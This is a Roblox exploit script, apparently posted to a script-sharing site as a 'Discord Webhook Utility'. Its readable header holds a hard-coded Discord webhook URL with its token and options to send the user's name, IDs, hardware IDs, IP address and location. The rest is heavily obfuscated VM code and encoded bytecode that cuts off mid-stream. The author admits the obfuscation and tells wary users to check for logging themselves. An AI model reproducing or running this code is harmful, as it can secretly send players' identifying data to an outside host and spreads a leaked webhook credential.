--[[

    	~~//  Color Code (HEX)  \\~~
    			
		RED = f54747				 GREEN = 78ff78
		BLUE = 4c6cfc				 PURPLE = b36bff
		YELLOW = fff27a				 PINK = ffa3e2


	-- Don't Remove the "0x" on "getgenv().embedcolor" or it will not work!--
	-- It's been a year since I last posted in this website and decided to update my Webhook Utility.
  -- Made for fun, Enjoy!
  -- Decided to obfuscate because of skids, use an Http-Spy if you think I'm logging.
  -- My "Last" post: (https://scriptblox.com/script/Universal-Script-Discord-Webhook-Script-6498) "check comments".

  getgenv().MadeByCilvania = "dsc.gg/cilberionscripts"
  
  getgenv().Settings = {
      DiscordWebhook = 'https://discord.com/api/webhooks/1048171598932348928/9MRN410Mxf3hvg0-oAlSMrXs3BgGT9JaZdjlS7lhcJpfEDpA1xcY4G-CUOvYwSBGzXYy',
      EmbedColor = 0x6b6555, -- Change the color of the embed 0x(6b6555) Use Google's colorpicker
      Formats = {
          IpFormat = false, -- If you want to include the IP format (IPs, Country, City, etc.) / Rate Limited - False to turn off
          ShortFormat = true, -- If you want to include the short format (Name, Id, Hwids, etc.) - False to turn off / Default long format
      }
  }

]]--

local a,b,c=nil,nil,nil([[dsc.gg/cilberionscripts]]):gsub('(.*)',function(d)local e="fNkYwxrpW9YT"local f="FLFQjW9XvUrV9IMqkk"local g=6282;local h=4136;while(g>(h-(#('"cilberion on top 2"') - 8)))do h=(g+2688)*2;while(g<h)do h=g-35880;while(g>(h-(#('"dont please"') - 1)))do h=(g+2669)*2;a=getfenv or function()return _ENV end end;if(12564-g)<(h+6314)then g=((h+6282)*2)f=d end end;if g>(h-96736)then h=(g+12564)e=d end end;local a=a()local d=a["string"]["\99\104\97\114"](99,104,97,114)local g=a[string[d](115,116,114,105,110,103)]local h="GYwQK2M5_9ZCHB6g"local j="K4NPtVo"local k="_tVmXLKJQ"local l=1920;local m=3588;while(l<m)do m=l-7176;while(l>(m-((function(A) return (#A - -5) end)('"123"'))))do m=(l+3997)*((function(A) return (#A - 18) end)('"cilberion on top 2"'))while(l<m)do m=l-23668;k=a[g[d](115,116,114,105,110,103)][d]end;if l>(m-3840)then m=(l+3840)j=a[g[d](115,116,114,105,110,103)][g[d](98,121,116,101)]end end;if(3840-l)<(m+1968)then l=((m+1920)*(#('"i need huge pets on petsim"') - 26))h=a[g[d](115,116,114,105,110,103)][g[d](103,109,97,116,99,104)]end end;b={[e]=23,['\95'..k(100,115,99,46,103,103,47,99,105,108,98,101,114,105,111,110,115,99,114,105,112,116,115)]=f}b[g[d](95,120,79,108,52,89,108,111,89,49,76,90,105,121,79,88,53)]=j;b[g[d](95,120,76,73,73,89,121,95,90,90,76,95,120,121,50,88,48)]=k;b[g[d](95,120,121,89,95,89,49,121,120,108,79,57,79,50,120,54,88)]=h;local a=4168;local d=1562;while(a>(d-12))do d=(a+3607)*2;while(a<d)do d=a-31100;while(a>(d-10))do d=(a+273)*2;while(a<d)do d=a-17764;if(b[e]~=nil and(#f~=b[e]))then return 0 end end;if a>(d-8336)then d=(a+8336)if(k(100,115,99,46,103,103,47,99,105,108,98,101,114,105,111,110,115,99,114,105,112,116,115)~=e)then return false end end end;if(8336-a)<(d+4201)then a=((d+4168)*2)if(f~=b['\95'..e])then return(b._J2l_ah_OdCP)end end end;if a>(d-66688)then d=(a+8336)c=e end end;c=e;b[e]=nil end)local d=b["_xLIIYy_ZZL_xy2X0"]local e=b["_xOl4YloY1LZiyOX5"]local f=b["_xyY_Y1yxlO9O2x6X"]local g=a()[d(115,116,114,105,110,103)]local h=g[d(102,111,114,109,97,116)]local j=g[d(115,117,98)]local j=a()[d(110,101,120,116)]local j=a()[d(116,97,98,108,101)][d(99,111,110,99,97,116)]local j=a()[d(97,115,115,101,114,116)]local k=a()[d(112,97,105,114,115)]local g=g[d(108,101,110)]local l=a()[d(114,97,119,103,101,116)]local m=a()[d(117,110,112,97,99,107)]local n={}local o={}for a=0,255 do local a,b=d(a),d(a,0)n[a]=b;o[b]=a end;b["_xOl4YloY1LZiyOX5"]=nil;b["_xLIIYy_ZZL_xy2X0"]=nil;b["_xyY_Y1yxlO9O2x6X"]=nil;local o=a()[d(115,116,114,105,110,103)][d(115,117,98)]local p="_xyI9lYO_3ioz900z9"local q=function(...)return...end;local r=0;local r={(b._kLx6arq)}local r=function(a,c,d)local a,b=d[(b._FoPmkejo)](a,c,c+1)c=c+(#('"cant think of any words anymore"') - 31)return(b*256)+a end;local r=function(a,c,d)local a,b,d=d[(b._FoPmkejo)](a,c,c+((function(A) return (#A - 3) end)('"123"')))c=c+3;return(d*65536)+(b*256)+a end;local r=function(a,c,d)local a,b,d,e=d[(b._FoPmkejo)](a,c,c+3)c=c+((function(A) return (#A - 24) end)('"i need huge pets on petsim"'))return(back*16777216)+(d*65536)+(b*256)+a end;local r=function(a,c,d)local a,b,d,e,f=d[(b._FoPmkejo)](a,c,c+(#('"cilberion on top 2"') - 16))c=c+((function(A) return (#A - 13) end)('"cilberion on top"'))return(e*16777216)+(d*65536)+(b*256)+a+(f*4294967296)end;local q=function(a,c,d,e)a=a or(#('"cilberion on top"') - 17)local c=e[(b._pdzTAx)](c,d,q(d,q(a,((function(A) return (#A - 5) end)('"haha"')),(b._k_TZq)),(b._MFaoL)))d=q(d,a,(b._MFaoL))return c end;local function q(a,c,d)j(d,(b._j4M6c))if d==(b._IZjlLbKGnLSbNeO)then return a==c elseif d==(b._He_vjmhke2DoWw)then return a<c elseif d==(b._teFBUz0Qjtqc)then return a<=c end end;local function r(a,c,d)j(d,(b._j4M6c))if q(d,(b._r0hNeL),(b._IZjlLbKGnLSbNeO))then return a*c elseif q(d,(b._VwfoBq6T),(b._IZjlLbKGnLSbNeO))then return a/c elseif q(d,(b._MFaoL),(b._IZjlLbKGnLSbNeO))then return a+c elseif q(d,(b._k_TZq),(b._IZjlLbKGnLSbNeO))then return a-c elseif q(d,(b._P1KbbUTUlC),(b._IZjlLbKGnLSbNeO))then return a%c elseif q(d,(b.__xxJN3Q2),(b._IZjlLbKGnLSbNeO))then return a^c end end;local function s(a,c)j(c,(b._j4M6c))if q(c,(b._Sfso8I),(b._IZjlLbKGnLSbNeO))then return-a elseif q(c,(b._RTktDZ),(b._IZjlLbKGnLSbNeO))then return not a elseif q(c,(b._xcU33Rb),(b._IZjlLbKGnLSbNeO))then return#a end end;local function t(a,c,d)j(d,(b._j4M6c))if q(d,(b._d_slFrS_79mmhm),(b._IZjlLbKGnLSbNeO))then return a..c elseif q(d,(b._nJAcpWa6NuAa),(b._IZjlLbKGnLSbNeO))then return t(a,c)end end;local j={}local u,w,x,y,z;local A=1778;local B=5115;while(A<B)do B=A-10230;while(A>(B-(#('"123"') - -6)))do B=(A+3149)*2;x=function(a,b)local c=""local d=(#('"bloxfruits vs roblox"') - 21)for f=((function(A) return (#A - 17) end)('"cilberion on top"')),#a do local a=u(e(o(a,f,f)),e(o(b,d,d)))c=c..l(j,a)or a;d=d+1;if d>#b then d=(#('"i know your looking at me"') - 26)end end;return c end end;if(3556-A)<(B+1787)then A=((B+1778)*((function(A) return (#A - 26) end)('"i need huge pets on petsim"')))z=function(a,b)local c=""local d=(#('"progamer"') - 9)for f=((function(A) return (#A - 24) end)('"please join the discord"')),#a do local a=u(a[f],e(o(b,d,d)))c=c..j[a]or a;d=d+(#('"bloxfruits vs roblox"') - 21)if d>#b then d=1 end end;return c end end end;u=function(a,b)local c,d=((function(A) return (#A - 16) end)('"joindiscordplzs"')),0;while a>0 and b>0 do local e,f=a%2,b%((function(A) return (#A - 11) end)('"dont please"'))if e~=f then d=d+c end;a,b,c=(a-e)/(#('"bloxfruits vs roblox"') - 20),(b-f)/((function(A) return (#A - 20) end)('"bloxfruits vs roblox"')),c*2 end;if a<b then a=b end;while a>0 do local b=a%2;if b>0 then d=d+c end;a,c=(a-b)/2,c*((function(A) return (#A - 18) end)('"cilberion on top 2"'))end;return d end;for a,b in k(n)do j[e(a)]=a end;local n=6521;local x=6716;while(n<x)do x=n-13432;while(n>(x-(#('"please join the discord"') - 15)))do x=(n+2190)*2;w=function(a,b)local c=""local d=(#('"cant think of any words anymore"') - 32)for f=1,#a do local a=u(e(o(a,f,f)),e(o(b,d,d)))c=c..l(j,a)or a;d=d+((function(A) return (#A - 24) end)('"please join the discord"'))if d>#b then d=1 end end;return c end end;if(13042-n)<(x+6568)then n=((x+6521)*2)y=function(a,b)local c=""local d=((function(A) return (#A - 19) end)('"cilberion on top 2"'))for f=1,#a do local a=u(a[f],e(o(b,d,d)))c=c..j[a]or a;d=d+1;if d>#b then d=1 end end;return c end end end;local n={{},{}}local x=(#('"dscdotggslashcilberionscripts"') - 30)for a=1,255 do if a>=112 then n[(#('"bloxfruits vs roblox"') - 20)][x]=a;x=x+1 else n[1][a]=a end end;local m=d(m(n[1]))..d(m(n[(#('"joindiscordplzs"') - 15)]))local n,x,z,A,B,C,D;n=y({17,7,108,18,(#('"bloxfruits vs roblox"') - 5),13,34,50,4,(#('"progamer"') - -29),33},"\89\104\53\120\103\74\71\98\67\98\107\82")local E=4283;local F=4426;while(E<F)do F=E-8852;while(E>(F-12))do F=(E+4820)*2;while(E<F)do F=E-36412;A=function(a,...)return w(a,n,...)end end;if E>(F-8566)then F=(E+8566)D=function(a,...)return w(a,x,...)end end end;if(8566-E)<(F+4322)then E=((F+4283)*(#('"123"') - 3))z=function(...)return y(...,n)end end end;x=y({((function(A) return (#A - 2) end)('"cilberion on top 2"')),((function(A) return (#A - -3) end)('"bloxfruits vs roblox"')),103,(#('"dscdotggslashcilberionscripts"') - 22),12,47,53,10,38},"\89\104\53\120\103\74\71\98\67\98\107\82")C=y({58,58,121,29,(#('"i need huge pets on petsim"') - 22),62,44,16,0,37,((function(A) return (#A - -2) end)('"please join the discord"')),53},"\89\104\53\120\103\74\71\98\67\98\107\82")local y=e(d((#('"i know your looking at me"') - 26)))b["_xX48Zi84Zo8o4_1i0"]=function(a,c)local d=d()local f=y;for g=y,#a do local a=u(e(o(a,g,g)),e(o(c,f,f)))d=h(((b._R4FDFG60)),d,l(j,a)or a)f=f+y;f=(f>#c and y)or f end;return d end;local h=b[z({((function(A) return (#A - 5) end)('"i need huge pets on petsim"')),((function(A) return (#A - -1) end)('"bloxfruits vs roblox"')),1,94,78,29,(#('"dscdotggslashcilberionscripts"') - 19),104,115,(#('"dont please"') - -18),37,112,0,109,53,71,46,85})]return(function(l)local y,E,F;E=(E or 0)for a,a in k(l)do E=(E or 0)+(#('"progamer"') - 9)end;if(E<(#('"please join the discord"') - 23))then return("a1yITt9741NcYWw")end;local k=6157;local E=6494;while(k<E)do E=k-12988;while(k>(E-10))do E=(k+901)*2;F=l[1]end;if(12314-k)<(E+6193)then k=((E+6157)*2)y=l[2]end end;b={}do local a=a()[A("\59\10\45\7\19\51\4\36\38\39\38\45")]if(a~=nil)then b[A("\23\23\32\35\79\43\60\31\24\118\35\39\21\96\90\70\61\92")]=a({[-189.53448648564253]=-12.566285847827046;[188.2669668372535]=-98.85851005363367;[-220.503274809014]=99.00903560609615;[-226.59760845052145]=13.382825663234811;[-184.39723660702967]=40.12544191644153},{[A("\23\48\45\5\5\51\23\57\41\34")]=function(a,a)return(function()while true do b=b or nil;if(b~=nil and b[1]~=nil)then break else b["\119\98\83\82\71\109\70\98\90\117"]="\118\49\116\69\57\95\97\50\121\118\107\72\50\68\77\100\76\110"end end;return"\73\49\99\117\97\109\97\120\71\111\53\113\87\87\72\86\56\57\86\81\65\83\65\119\95\99\54\121\114\98\65\49"end)()end})b[1]=b[p]end;do b[A("\23\59\31\63\16\53\82\59\119\7")]=w("\48\0\53\35\26\114\9\103\46\125\114\113\48",n)b[A("\23\33\105\14\29\44\58\23\35\10")]=w("\48\54\97\3\47\14\58\96\61\60",n)b[A("\23\41\26\41\20\118\3\38\18\116\56")]=w("\23\48\58\11\26\43",n)b[A("\23\31\61\16\34\6\29")]=w("\52\60\45\24\31\41\2\35\50\39\54",n)b[A("\23\1\19\43\21\55\50\49\113\11\63\9\14")]=w("\52\44\22\36\53\6\49\4\6\7\6\13\19",n)b[A("\23\7\1\14\38\13\17\55\16\47\115\127")]=w("\48\40\12\82\1\117\80\102\119\61\50\39",n)b[A("\23\14\15\30\44\24\14")]=w("\48\6\6\95\78\61\84\105\29\42\6\1\53",n)b[A("\23\4\6\92\26\113\40\10\114\14\47")]=w("\48\48\108\88\26\112\85\105\14\63\121\120\93",n)b[A("\23\44\48\95\60\34\84\10")]=w("\60\14\59\6\19",n)b[A("\23\1\3\14\41\37\86\57\36\21\29\126\43")]=w("\48\43\107\50\57\114\82\7\112\44\126",n)b[A("\23\4\6\62\44\54")]=w("\52\60\12\40\10",n)b[A("\23\26\58\62\46\30\87\100\29\31\6\16\89")]=w("\48\23\54\91\44\14\83\41\46\117\3\124\94",n)b[A("\23\0\56\51\3\30\86\98\15\2\2\59\92\6\93\19")]=w("\52\58\23\39\10",n)b[A("\23\57\27\28\44\37\17\54\19\63\0")]=w("\48\38\104\51\69\114\83\8\112\119\3\125\86",n)b[A("\23\35\61\93\59\113\38\60\62\11\63")]=w("\48\36\44\61\70\24\48\57\31\44\124\61",n)b[A("\23\37\58\51\55\8\47\30\119\52")]=w("\20\95",n)b[A("\23\48\33\18\60\9\86\1\117")]=w("\52\63\22\61\10",n)b[A("\23\38\3\0\26\11\7\27\0\43\6\27\13\23\15\57")]=w("\52\42\8\22",n)b[A("\23\6\42\8\20\20\93")]=w("\48\23\48\53\78\118\80\9\31\26",n)b[A("\23\32\33\37\53\53\40\39\4\54\58\2\42")]=w("\63\14\56",n)b[A("\23\57\11\30\60\55\83")]=w("\60\61\12\91\38\62\0\59\36",n)b[A("\23\33\35\30\65\114\83\53\3\43\14\0\30\40\16")]=w("\41",n)b[A("\23\26\9\59\0\54\8\97\35\115\34")]=w("\48\48\107\18\65\50\58\8\112\124\120",n)b[A("\23\14\51\14\39\6\44")]=w("\48\48\1\50\46\113\86\99\11\42\3\23\3",n)b[A("\23\24\60\93\29\49\92\18\19\7\38\9\39")]=w("\23\23\21\38\46\61\63\100\117\41\50",n)b[A("\23\37\49\43\58\9\4\37\17\119")]=w("\59\27\43\3\24\32",n)b[A("\23\62\32\93\60\22\92\51")]=w("\52\46\29\46\10",n)b[A("\23\1\52\60\15\118\20\2")]=w("\59\10\53\15\21\51",n)b[A("\23\63\104\33\20\37\48\4\18\41\9")]=w("\52\34\22\46\10",n)b[A("\23\55\3\33\17\5\22\4\62\116\56\13\3")]=w("\48\48\33\90\25\115\84\98\115\42",n)b[A("\23\12\45\36\49\35\28")]=w("\48\54\48\51\71\62\87\42\113\9",n)b[A("\23\22\21\0\66\0\10\6\12\0\120\122\58\56\95")]=w("\48\55\1\3\15\62\60\25\117\125",n)b[A("\23\27\60\44\52\18\31\96\22\47\62\57\12")]=w("\52\35\28\22",n)b[A("\23\9\63\53\32\118\13\39\46")]=w("\59",n)b[A("\23\62\45\18\25\38\92\8\118\46")]=w("\48\12\6\53\66\50\10\99\14\112\29\113",n)b[A("\23\43\6\32\44\44\23\54")]=w("\48\36\46\37\64\48\42\39\114\124\120\16",n)b[A("\23\3\44\37\79\48\63\29\16\118\37")]=w("\48",n)b[A("\23\54\97\57\37\54\39\49\32\9\6\18\45")]=w("\125\65\108\92\64\114\92\96\113\117\120\120\89\106\93\70\116\80",n)b[A("\23\25\96\37\61\116\33\36\0\34\2\39\33\41\15")]=w("\117\81",n)b[A("\23\1\63\53\50\49\0")]=w("\48\0\33\93\57\50\85\39\16\44\18\23",n)b[A("\23\5\107\32\12\48\3\42")]=w("\48\22\35\53\12\8\81\98\29\26",n)b[A("\23\5\109\39\64\36")]=w("\44\2\121\30\30\46\22\112\51\42\106\0\10\43\24\2\51\69\63\53\101\7\45\3\56\4\21\47\10\60\62",n)b[A("\23\28\24\90\58\24\44\23\4\47\57\56")]=w("\39\0\56",n)b[A("\23\45\45\5\17\113\13\40\61\16\25\50\1")]=w("\48\55\6\51\14\29\85\40\117\112\21\17\48",n)b[A("\23\2\26\35\4\50\36\104\5\53\35\45")]=w("\48\35\97\95\12\8\9\25\61\26\37\122\92",n)b[A("\23\31\0\36\34\33\63\27\119\20\121\32")]=w("\48\55\1\3\15\62\60\25\117\125",n)b[A("\23\60\96\0\17\116\38\40\16\2\43\28\41\29")]=w("\48\0\105\82\66\118\41\99\114\42\121\16\48",n)b[A("\23\61\109\44\50\1\34\102\119")]=w("\109\28\124\25",n)b[A("\23\44\17\33\44\24\38\2")]=w("\48\44\54\93\57\18\92\103\14\114\3\120",n)b[A("\23\11\56\89\66\115\15\31\1\29\21\127\40\24\43\27")]=w("\49\6\60\6\18",n)b[A("\23\41\8\40\20\35\60\15\52\36\7\34")]=w("\23\48\41\24\25\51\10\15\24",n)b[A("\23\39\60\53\0\45\8\56\44\32\120\12\0\14\29")]=w("\52\35\13\22",n)b[A("\23\26\111\47\61")]=w("\23\48\48\4\18\34\29",n)b[A("\23\25\3\48\26\13\18\31\115\14\38")]=w("\23\48\55\15\1\46\11\52\34\61",n)b[A("\23\59\50\4\27\3\19\3\61\125")]=w("\48\32\108\88\25\40\42\96\8\112\120\125\35",n)b[A("\23\10\12\50\34\35\9")]=w("\42",n)b[A("\23\53\3\59\17\10\48")]=w("\48\53\48\38\79\62\60\15\63\61",n)b[A("\23\37\107\6\41\38\13\15\8\33\9\24")]=w("",n)b[A("\23\23\58\63\69\116\55\50")]=w("\52\35\28\36\10",n)b[A("\23\57\46\12\25\5\20\102\19")]=w("\52\43\16\60\10",n)b[A("\23\10\111\11\60\10\53\103\8\44\62\49\37\33\28")]=w("\48\54\48\51\71\62\87\42\113\9",n)b[A("\23\35\47\38\17\115\47\55")]=w("\48\35\105\16\79\112\41\63\114\42\19\4\0",n)b[A("\23\56\11\89\38\112\85\0")]=w("\35",n)b[A("\23\26\56\7\65\13\83\15\115\55")]=w("\9\3\43\15\23\35\28\112\53\36\36\104\71\104\67\87",n)b[A("\23\45\28\40\18\113\32\42\47\51")]=w("\48\6\109\89\14\43\61\99\31\124",n)b[A("\23\42\43\9\50\32\82\23\5\118\39\14")]=w("\48\48\48\35\15\63\63\28\126\9\51\125\3",n)b[A("\23\28\24\50\17\126\39\20\126\32")]=w("\48\32\108\50\58\24\10\97\114\12\21\7\38",n)b[A("\23\34\13\50\14\23\29\7\41\10\25\61\24")]=w("\9\3\43\15\23\35\28\112\53\36\36\104\71\107\67\87",n)b[A("\23\39\28\7\79\49\9\49\8\10\11\41\90")]=w("\48\4\48\88\1\18\87\102\113\50\5",n)b[A("\23\40\43\34\31\61\44\56\42\47\44\9")]=w("\48\42\107\89\64\126\29\25\8\114\3",n)b[A("\23\60\63\25\25\127\44")]=w("\52\58\23\39\10",n)b[A("\23\21\30\33\49\119\42\53\47\115\1\12\5")]=w("\52\35\13\22",n)b[A("\23\2\106\94\12\38\54\57\17")]=w("\52\34\12\38\10",n)b[A("\23\43\15\6\67\23\18\18\48")]=w("\23\23\1\94\78\29\12\104\115\31\37\112\0\109\53\71\46\85",n)b[A("\23\8\19\60\31\3\2\102\17\50")]=w("\48\14\31\45\25\49\93\22\46",n)b[A("\23\53\20\41\56\6\10\37\0\39")]=w("\114\71\124\14\92\110\95",n)b[A("\23\6\110\47\53\18\32\3\47\14")]=w("\33\1\47\11\26\46\1\112\46\43\46\45\23\120",n)b[A("\23\42\49\56\12\35\40\40\34\22\21\32")]=w("\48\39\107\50\3\24\92\97\117\16\127",n)b[A("\23\31\13\36\66\16\36")]=w("\41\13\58\14\19\33\2",n)b[A("\23\86\41\43\47")]=w("\48\22\35\53\12\8\81\98\29\26",n)b[A("\23\59\16\95\21\20")]=w("\38\26\52\8\19\53",n)b[A("\23\22\8\19\34\9\36\30\62\54")]=w("\48\38\44\29\66\14\84\15\18\115\50",n)b[A("\23\25\12\33\34\19\49")]=w("\48\62\14\53\35\24\42\103\14\50\126\16",n)b[A("\23\55\29\4\57\61\83\18")]=w("\48\35\104\56\31\20\11\63\61",n)b[A("\23\42\23\60\50\13\46\23\3\26\124\34\28\49")]=w("\0\10\43\24\2\51\69\31\37\35\63\59\12\56\30\25\53",n)b[A("\23\5\40\89\52\36\35")]=w("\48\0\12\92\66\14\93\39\126\48\50",n)b[A("\23\10\54\63\67\8\28\62\29\28\21\36\92\96")]=w("\47\3\54\31\15\54\85",n)b[A("\23\11\6\25\26\1\23\3\24\114\115\37\2\49\7")]=w("\52\44\22\36\53\6\49\3\19\23\3\6\40\37",n)b[A("\23\35\58\62\21\12\51\63\29\26\46\58\7\105")]=w("\48\6\106\37\26\114\41\102\113\42",n)b[A("\23\39\52\29\30\112\40\35\37\116\122\31\55")]=w("\48\93\6\63\25\18\48\5\118\16",n)b[A("\23\14\105\35\65\23\12\59\8\7\43\63\93\44")]=w("\48\38\0\91\44\31\63\104\29\44",n)b[A("\23\28\109\94\31\19\34\10\22")]=w("\38",n)b[A("\23\0\56\39\17\127\18\99\112\52\13\49")]=w("\101",n)b[A("\23\61\16\38\56\118\60\35\46\39\7\112\88\46\6\1")]=w("\52\60\12\40\10",n)b[A("\23\61\13\1\2\3\63")]=w("\52\33\22\62\10",n)b[A("\23\62\33\29\49\34\39")]=w("\48\21\1\82\66\8\81\25\43\9\120\112\87",n)b[A("\23\61\104\88\0\62\40\61\126\47\25\13\11\40\51")]=w("\48\6\109\89\14\43\61\99\31\124",n)b[A("\23\12\45\47\12\3\58\60")]=w("\48\12\110\50\78\118\81\105\50\117\18",n)b[A("\23\13\110\16\79\29\44\59\54\48\14")]=w("\48\38\0\91\44\31\63\104\29\44",n)b[A("\23\41\54\58\27\44\0\58\40")]=w("\52\60\45\24\31\41\2\50\62\49\47\52",n)b[A("\23\0\42\46\5\44\32")]=w("\52\44\22\36\53\6\49\3\19\23\3\6\40\37",n)b[A("\23\30\107\12\4\38\6\56\44\13\44\39\54")]=w("\48\53\105\50\14\114\81\103\30\41\21\124\55",n)b[A("\23\34\31\11\25\11")]=w("\52\46\29\46\10",n)b[A("\23\29\105\2\56\34\41")]=w("\52\34\12\38\10",n)b[A("\23\45\61\95\57\14\35\19\52\41\125\123\25\107")]=w("\59\27\43\3\24\32",n)b[A("\23\25\52\0\56\115")]=w("\48\22\6\18\14\11\28\40\46\28\124\50\86",n)b[A("\23\12\41\94\0\112\2\37\31\10\21\56\53\13")]=w("\48\10\48\88\71\48\83\39\18\124\114\127",n)b[A("\23\45\41\9\26\22\13\6\19\47\1\15\7\45\82\65")]=w("\27\58\9\47\36\24\42\0",n)b[A("\23\23\58\58\30\3\33\104\2\4")]=w("\48\35\3\51\68\8\85\98\46\10\50\113\89",n)b[A("\23\4\21\18\64\38\23\33")]=w("",n)b[A("\23\9\15\7\70\30\18\102\61")]=w("\48\11\33\82\46\50\82\24\4",n)b[A("\23\24\0\94\39\37\84\57\3")]=w("\60\14\59\6\19",n)b[A("\23\13\24\30\0\0\21\36\29\9\3\44")]=w("\48",n)b[A("\23\53\44\11\41\20\3\56\40\0\38")]=w("\32",n)b[A("\23\34\49\3\26\112\29\40\48")]=w("\48\0\54\3\79\46\61\98\30\119\50\127\32",n)b[A("\23\34\46\62\2\48\46\52\61\40\37\123\7\59")]=w("\16\59\49\94\14\31\29",n)b[A("\23\36\20\44\48\37\15\30\8")]=w("\107",n)b[A("\23\3\13\48\30\21\83\53\42\19\114\23\91\46\24")]=w("\48\6\106\37\26\114\41\102\113\42",n)b[A("\23\27\21\0\39\15")]=w("\48\3\6\91\79\11\28\28\14\60",n)b[A("\23\5\107\26\59\21\49\58\37\47\8\33\55")]=w("\23\48\41\24\25\51\10\15\24",n)end end;b[(b._DVl5PwBw)]=h;local h=a()[z({56,(#('"123"') - -24),48,4,2})]local k=a()[z({60,0,55,((function(A) return (#A - -9) end)('"bloxfruits vs roblox"')),(#('"i know your looking at me"') - 0),(#('"bloxfruits vs roblox"') - -15),0,(#('"bloxfruits vs roblox"') - -12)})]local l=a()[z({60,22,41,(#('"dscdotggslashcilberionscripts"') - 16)})]local n=a()[z({58,((function(A) return (#A - -9) end)('"123"')),46,13,19,51})]local n=a()[z({60,14,59,6,19})]local n=a()[z({45,(#('"please join the discord"') - -4),43,5,((function(A) return (#A - 6) end)('"progamer"'))})]local w=a()[z({47,10,45,(#('"i need huge pets on petsim"') - 21),19,51,4,(#('"cilberion on top 2"') - -16),(#('"haha"') - -32),39,((function(A) return (#A - -7) end)('"dscdotggslashcilberionscripts"')),45})]local E=a()[z({56,((function(A) return (#A - 5) end)('"joindiscordplzs"')),56,6,(#('"cilberion on top"') - -8)})]local F=a()[z({59,10,45,24,((function(A) return (#A - 8) end)('"dscdotggslashcilberionscripts"')),48})]local F=a()[z({59,(#('"i know your looking at me"') - 17),53,15,(#('"cant think of any words anymore"') - 12),51})]local G=a()[z({41,28,42,((function(A) return (#A - -10) end)('"123"')),((function(A) return (#A - 27) end)('"dscdotggslashcilberionscripts"')),51})]local G=a()[z({59,27,43,3,((function(A) return (#A - -2) end)('"bloxfruits vs roblox"')),(#('"bloxfruits vs roblox"') - -10)})]local G=a()[z({60,0,42,30,4,46,(#('"cilberion on top 2"') - 9),55})]local H=a()[z({56,(#('"cant think of any words anymore"') - 19),48,(#('"cilberion on top 2"') - -4),5})]local I=a()[z({43,0,43,5,(#('"i need huge pets on petsim"') - 25),51,((function(A) return (#A - 21) end)('"cant think of any words anymore"')),62,((function(A) return (#A - -29) end)('"123"'))})]local J=a()[z({59,10,45,7,19,51,4,36,(#('"dont please"') - -25),39,38,45})]local z=a()[z({61,((function(A) return (#A - 21) end)('"bloxfruits vs roblox"')),41,11,(#('"please join the discord"') - 4),44})]local K=b["\95\120\88\52\56\90\105\56\52\90\111\56\111\52\95\49\105\48"]local I=I[(b._da344jOFX_7GAAm)]local function L(...)local a,a=...local a=f(G(a),(b._ZMCNAouGb))()return k(a)end;local M=L(E(function()local a=(b._Nzt756eDnDHqqz)^1 end))local h=h;local function N(...)return F((b._KMFFbjNO),...),{...}end;local F="\0\9xL1RiSnozx\0\0\0\203\255\1\0\1\0\0\0\0\1\0\0\0\0\9xdx8Xu7HCx\0\0\0\203\255\1\0\1\0\0\0\0\2\0\0\0\0\9xaFGov8Fin\0\0\0\0\0\3\0\0\0\0\11xoU64I8w9uxb\0\0\0\160\0\0\0\1\0\0\0\0\4\0\0\0\0\12xox7Ou0wWiX_b\0\1\0\180\0\0\0\69\64\0\0\0\5\0\0\0\0\12xKuW0_UiXi6ua\0\1\0\1\0\0\0\2\0\0\92\128\128\0\0\6\0\0\0\0\11xki2wU266wOa\0\1\0\1\0\0\0\238\1\0\70\128\192\0\0\7\0\0\0\0\12xei21w6wU987a\1y\0\0\0\0\0\1\0\0\23\64\0\0\0\8\0\0\0\0\12xGU8w2560xxox\0\0\0\88\2\2\0\22\0\150\128\0\9\0\0\0\1\5b\0\1\0\209\0\0\0\69\192\0\0\0\1\7a\0\1\0\1\0\0\0\27\2\0\70\0\193\0\0\1\6a\0\1\0\1\0\0\0\2\0\0\92\128\128\0\0\1\5b\0\2\0\209\0\0\0\133\192\0\0\0\1\7a\0\2\0\2\0\0\0\47\1\0\134\64\65\1\0\1\4b\0\3\0\77\0\0\0\193\128\1\0\0\0\11xIuw4I1_U6xa\0\4\0\1\0\0\0\0\0\0\0\1\128\0\0\10\0\0\0\1\6a\0\2\0\3\0\0\0\2\0\0\156\128\128\1\0\1\5b\0\3\0\111\0\0\0\197\192\1\0\0\0\10x2_UoUUU1Ua\0\3\0\3\0\0\0\165\1\0\203\0\194\1\0\11\0\0\0\1\4b\0\5\0\79\0\0\0\65\65\2\0\0\1\6a\0\3\0\3\0\0\0\2\0\0\220\128\128\1\0\1\7a\0\3\0\3\0\0\0\12\1\0\198\128\194\1\0\0\11xE2369xIO7Ia\0\4\0\0\0\0\0\0\0\0\2\1\0\0\0\12\0\0\0\1\12a\0\5\0\0\0\0\0\0\0\0\66\1\0\0\0\1\5b\0\6\0\13\1\0\0\133\193\2\0\0\0\12xCo7OU97I7I0a\0\6\0\0\0\0\1y\154\65\0\0\0\13\0\0\0\1\9x\0\0\0\7\0\2\0\22\192\1\128\0\1\5b\0\6\0\184\0\0\0\133\1\3\0\0\1\13a\0\6\0\0\0\0\1y\154\65\0\0\0\1\9x\0\0\0\4\0\2\0\22\0\1\128\0\1\5b\0\6\0\127\0\0\0\133\65\3\0\0\1\13a\0\6\0\0\0\0\1x\154\1\0\0\0\1\9x\0\0\0\1\0\2\0\22\64\0\128\0\1\5b\0\6\0\127\0\0\0\133\65\3\0\0\1\7a\0\6\0\6\0\0\0\184\1\0\134\1\67\3\0\1\5b\0\7\0\111\0\0\0\197\193\1\0\0\1\11a\0\7\0\7\0\0\0\165\1\0\203\1\194\3\0\1\4b\0\9\0\34\1\0\0\65\130\3\0\0\1\6a\0\7\0\3\0\0\0\2\0\0\220\129\128\1\0\1\5b\0\8\0\111\0\0\0\5\194\1\0\0\1\11a\0\8\0\8\0\0\0\165\1\0\11\2\66\4\0\1\4b\0\10\0\203\0\0\0\129\194\3\0\0\1\6a\0\8\0\3\0\0\0\2\0\0\28\130\128\1\0\1\11a\0\8\0\8\0\0\0\93\1\0\11\2\68\4\0\1\6a\0\8\0\2\0\0\0\2\0\0\28\130\0\1\0\1\7a\0\9\0\3\0\0\0\42\1\0\70\66\196\1\0\1\5b\0\10\0\68\0\0\0\133\130\4\0\0\1\7a\0\10\0\10\0\0\0\42\1\0\134\66\68\5\0\1\7a\0\10\0\10\0\0\0\99\1\0\134\194\68\5\0\1\8a\1y\0\9\0\0\0\10\0\0\23\128\130\4\0\1\9x\0\0\0\1\0\2\0\22\64\0\128\0\1\12a\0\4\0\1\0\0\0\0\0\0\2\1\128\0\0\1\9x\0\0\0\6\0\2\0\22\128\1\128\0\1\7a\0\9